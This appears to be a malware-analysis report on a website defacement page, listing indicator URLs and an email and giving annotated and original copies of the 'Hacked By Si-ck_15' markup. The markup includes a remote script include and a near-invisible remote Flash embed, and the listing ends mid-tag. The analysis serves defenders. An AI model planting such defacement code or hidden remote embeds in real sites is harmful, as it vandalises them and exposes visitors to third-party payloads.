PHP Malware Analysis


Tags

URLs
http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3
https://wallpapercave.com/wp/wp2022228.jpg
https://m.facebook.com/Anonymous-team-dz-1416169705351491
http://yourjavascript.com/2146179535/rebel3..js
http://8pic.ir/images/95915944731535871828.swf
http://8pic.ir/images/95915944731535871828.swf
https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif
https://api.whatsapp.com/send?phone=628994422616
Emails
ammazigh404@gmail.com
Execution
eval

Deobfuscated code

<!-- Analyst note: static defacement markup. The keywords meta tag, the title and the banner carry the handle; the style element holds only stray text and one link rule. -->
<META NAME="Keywords" CONTENT=Hacked By
Si-ck_15"">

<Title>Hacked By Si-ck_15!</title>

<Style TYPE="text/css">

					gtffrjhfthhhhhhhr

 


A { text-decoration: none; }

</Style>
<center><<font size="20"><font
color="red"</font>*Si-ck_15 <3*</center>
<!-- Analyst note: autoplaying audio. The first source is a relative file name and the second is an MP3 fetched over plain http from a third-party host; the image below is also loaded from a remote host. -->
<center> <audio controls autoplay>
  <source src="horse.ogg" type="audio/ogg">
  <source src="http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio> 
</audio></center>
<center>
<img src="https://wallpapercave.com/wp/wp2022228.jpg"
height="420"
width="550">
<div align="center">
<pre style="font: 30px/20px courier;"><b><script
language="JavaScript1.2">
// Analyst note: hard-coded banner text plus colour and timing settings for the
// letter-by-letter "neon" effect implemented by neon() and beginneon() below.
var message="Your Website was Hacked By Si-ck_15"
var neonbasecolor="gray"
var neontextcolor="blue"
var neontextcolor2="yellow"
var flashspeed=100                                             
var flashingletters=3  
var flashingletters2=1 
var flashpause=0       
 
var n=0
// Analyst note: emits one <span id="neonlightN"> per character of the constant
// message via document.write. No URL, cookie or other external input is read here.
// NOTE(review): as listed, the '<span literal is split across two lines, which would
// be a syntax error if the break is in the sample itself rather than a wrap in this listing.
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span
id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)
 
// Analyst note: returns the <span> element for letter index `number`.
// The eval() call only builds a document.all.neonlightN lookup for browsers that expose
// document.all; the callers in neon() pass numeric indexes, so it does not execute decoded
// or remotely supplied content. This is the only literal eval in the listing and is
// presumably what the report's "Execution: eval" entry matched.
function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number)
: document.getElementById("neonlight"+number)
return crossobj
}
 
// Analyst note: one animation step, run on a timer started by beginneon().
// It recolours the letter at the global index n and the letters trailing it, then
// advances n. Purely cosmetic: only style.color on the banner spans is written.
function neon(){
 
//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}
 
//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor
 
// Letters further behind the head fade to the second colour, then back to the base colour.
if (n>flashingletters-1)
crossref(n-flashingletters).style.color=neontextcolor2
if (n>(flashingletters+flashingletters2)-1)
crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
 
 
// After the last letter: reset n, stop the interval and restart the cycle.
// The setTimeout argument is a constant string, evaluated as code when the timer fires.
if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}
 
// Analyst note: starts the animation by scheduling neon() every flashspeed milliseconds and
// storing the timer handle in the implicit global `flashing`. The setInterval argument is a
// constant string, so it is string-evaluated code but carries no attacker-variable content.
function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
// Kick off the first cycle as soon as the script is parsed.
beginneon()
 
</script></b></pre>
</div>
<!-- Analyst note: attribution text left by the defacer (self-description, a Facebook page link and an e-mail address). These are the same values the report lists under URLs and Emails. Several font tags here are malformed or never closed. -->
<pre>
<font size="20"><font color="blue">I'm
</font><font color="green">Amazigh
</font><font
color="yellow">Hacker</font><font
size="4"><br>

<font Thnx for my rabbit <3
</font><font size="3"><br>

<font size="6"> WE DO NOT FORGET <a
href="https://m.facebook.com/Anonymous-team-dz-1416169705351491">Facebook</a>

EMAIL:ammazigh404@gmail.com</font><font
size="3"><br>

<font size="6">Thank's to: MATOUB  </font><font
size="3">

<!-- Analyst note: external script fetched over plain http from a third-party host. Its contents are not part of this listing, so its behaviour cannot be judged from here; treat the URL as an indicator and retrieve the file separately if it is still served. -->
<script language="javascript"
type="text/javascript"
 src="http://yourjavascript.com/2146179535/rebel3..js"></script>


<!-- Analyst note: the same remote Flash file is embedded twice at 6 by 1 pixels, which makes it effectively invisible. Neither object element is closed in the listing, and the SWF itself is not shown. -->
<object type="application/x-shockwave-flash"
data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
   <OBJECT type="application/x-shockwave-flash" 

data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
<!-- Analyst note: the page background is a remote GIF, and the body rule has no closing brace before the style element ends. The two stylesheet links use relative "Hacked%20By%205H311_1NJ3C706_files/" paths, which look like a browser save-page resource folder from a page with a different handle in its title; this may indicate a reused template (inference, not confirmed by the listing). -->
<style> body { background-image:
url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");
background-size: cover; </style> <center> <link
href="Hacked%20By%205H311_1NJ3C706_files/css.css"
rel="stylesheet" type="text/css"> <link
href="Hacked%20By%205H311_1NJ3C706_files/css_002.css"
rel="stylesheet" type="text/css"> <h1
class="n3t"><font style="text-shadow: 2px 1px 20px
black;" face="Julee" size="9"
color="white"</h1><font style="text-shadow: 2px
1px
20px black;" face="Julee" size="30"
color="white">
<!-- Analyst note: TypingText is a typewriter-effect helper. The constructor stores the target element's innerHTML; run() writes it back one character per timer tick, buffering whole tags and HTML entities so markup is not split. Nothing in the visible listing constructs a TypingText or calls TypingText.runAll(). The timers are re-armed with string arguments built from the element id, so they are string-evaluated code; no network request or decoding step appears in this script. -->
<color="white"><rder="2px"><script
type="text/javascript"> TypingText = function(element,
interval, cursor, finishedCallback) { if((typeof document.getElementById
==
"undefined") || (typeof element.innerHTML ==
"undefined")) { this.running = true; return; } this.element =
element; this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; }); this.interval = (typeof interval ==
"undefined" ? 100 : interval); this.origText =
this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor
= (cursor ? cursor : ""); this.currentText = "";
this.currentChar = 0; this.element.typingText = this; if(this.element.id
==
"") this.element.id = "typingtext" +
TypingText.currentIndex++; TypingText.all.push(this); this.running =
false;
this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity =
false; this.HTMLEntityBuffer = ""; } TypingText.all = new
Array(); TypingText.currentIndex = 0; TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
} TypingText.prototype.run = function() { if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval); return; }
if(this.currentText == "") this.element.innerHTML =
"";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" &&
!this.inTag) { this.tagBuffer = "<"; this.inTag = true;
this.currentChar++; this.run(); return; } else
if(this.origText.charAt(this.currentChar) == ">" &&
this.inTag) { this.tagBuffer += ">"; this.inTag = false;
this.currentText += this.tagBuffer; this.currentChar++; this.run();
return;
} else if(this.inTag) { this.tagBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else if(this.origText.charAt(this.currentChar) ==
"&" && !this.inHTMLEntity) { this.HTMLEntityBuffer =
"&"; this.inHTMLEntity = true; this.currentChar++;
this.run(); return; } else if(this.origText.charAt(this.currentChar) ==
";" && this.inHTMLEntity) { this.HTMLEntityBuffer +=
";"; this.inHTMLEntity = false; this.currentText +=
this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else
if(this.inHTMLEntity) { this.HTMLEntityBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else { this.currentText +=
this.origText.charAt(this.currentChar); } this.element.innerHTML =
this.currentText; this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++; setTimeout("document.getElementById('" +
this.element.id + "').typingText.run()", this.interval); } else
{
this.currentText = ""; this.currentChar = 0; this.running =
false; this.finishedCallback(); } } </script>  <center>
<br> <font face="Julee" size="4"
color="dark blue"><a
href="https://api.whatsapp.com/send?phone=628994422616"><font
style="text-shadow: 2px 1px 4px black;" size="4"
color="white"></font></a></font></center><font
face="Julee" size="4" colo


Original code

<META NAME="Keywords" CONTENT=Hacked By
Si-ck_15"">

<Title>Hacked By Si-ck_15!</title>

<Style TYPE="text/css">

					gtffrjhfthhhhhhhr

 


A { text-decoration: none; }

</Style>
<center><<font size="20"><font
color="red"</font>*Si-ck_15 <3*</center>
<center> <audio controls autoplay>
  <source src="horse.ogg" type="audio/ogg">
  <source src="http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio> 
</audio></center>
<center>
<img src="https://wallpapercave.com/wp/wp2022228.jpg"
height="420"
width="550">
<div align="center">
<pre style="font: 30px/20px courier;"><b><script
language="JavaScript1.2">
var message="Your Website was Hacked By Si-ck_15"
var neonbasecolor="gray"
var neontextcolor="blue"
var neontextcolor2="yellow"
var flashspeed=100                                             
var flashingletters=3  
var flashingletters2=1 
var flashpause=0       
 
var n=0
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span
id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)
 
function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number)
: document.getElementById("neonlight"+number)
return crossobj
}
 
function neon(){
 
//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}
 
//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor
 
if (n>flashingletters-1)
crossref(n-flashingletters).style.color=neontextcolor2
if (n>(flashingletters+flashingletters2)-1)
crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
 
 
if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}
 
function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
beginneon()
 
</script></b></pre>
</div>
<pre>
<font size="20"><font color="blue">I'm
</font><font color="green">Amazigh
</font><font
color="yellow">Hacker</font><font
size="4"><br>

<font Thnx for my rabbit <3
</font><font size="3"><br>

<font size="6"> WE DO NOT FORGET <a
href="https://m.facebook.com/Anonymous-team-dz-1416169705351491">Facebook</a>

EMAIL:ammazigh404@gmail.com</font><font
size="3"><br>

<font size="6">Thank's to: MATOUB  </font><font
size="3">

<script language="javascript"
type="text/javascript"
 src="http://yourjavascript.com/2146179535/rebel3..js"></script>


<object type="application/x-shockwave-flash"
data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
   <OBJECT type="application/x-shockwave-flash" 

data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
<style> body { background-image:
url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");
background-size: cover; </style> <center> <link
href="Hacked%20By%205H311_1NJ3C706_files/css.css"
rel="stylesheet" type="text/css"> <link
href="Hacked%20By%205H311_1NJ3C706_files/css_002.css"
rel="stylesheet" type="text/css"> <h1
class="n3t"><font style="text-shadow: 2px 1px 20px
black;" face="Julee" size="9"
color="white"</h1><font style="text-shadow: 2px
1px
20px black;" face="Julee" size="30"
color="white">
<color="white"><rder="2px"><script
type="text/javascript"> TypingText = function(element,
interval, cursor, finishedCallback) { if((typeof document.getElementById
==
"undefined") || (typeof element.innerHTML ==
"undefined")) { this.running = true; return; } this.element =
element; this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; }); this.interval = (typeof interval ==
"undefined" ? 100 : interval); this.origText =
this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor
= (cursor ? cursor : ""); this.currentText = "";
this.currentChar = 0; this.element.typingText = this; if(this.element.id
==
"") this.element.id = "typingtext" +
TypingText.currentIndex++; TypingText.all.push(this); this.running =
false;
this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity =
false; this.HTMLEntityBuffer = ""; } TypingText.all = new
Array(); TypingText.currentIndex = 0; TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
} TypingText.prototype.run = function() { if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval); return; }
if(this.currentText == "") this.element.innerHTML =
"";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" &&
!this.inTag) { this.tagBuffer = "<"; this.inTag = true;
this.currentChar++; this.run(); return; } else
if(this.origText.charAt(this.currentChar) == ">" &&
this.inTag) { this.tagBuffer += ">"; this.inTag = false;
this.currentText += this.tagBuffer; this.currentChar++; this.run();
return;
} else if(this.inTag) { this.tagBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else if(this.origText.charAt(this.currentChar) ==
"&" && !this.inHTMLEntity) { this.HTMLEntityBuffer =
"&"; this.inHTMLEntity = true; this.currentChar++;
this.run(); return; } else if(this.origText.charAt(this.currentChar) ==
";" && this.inHTMLEntity) { this.HTMLEntityBuffer +=
";"; this.inHTMLEntity = false; this.currentText +=
this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else
if(this.inHTMLEntity) { this.HTMLEntityBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else { this.currentText +=
this.origText.charAt(this.currentChar); } this.element.innerHTML =
this.currentText; this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++; setTimeout("document.getElementById('" +
this.element.id + "').typingText.run()", this.interval); } else
{
this.currentText = ""; this.currentChar = 0; this.running =
false; this.finishedCallback(); } } </script>  <center>
<br> <font face="Julee" size="4"
color="dark blue"><a
href="https://api.whatsapp.com/send?phone=628994422616"><font
style="text-shadow: 2px 1px 4px black;" size="4"
color="white"></font></a></font></center><font
face="Julee" size="4" colo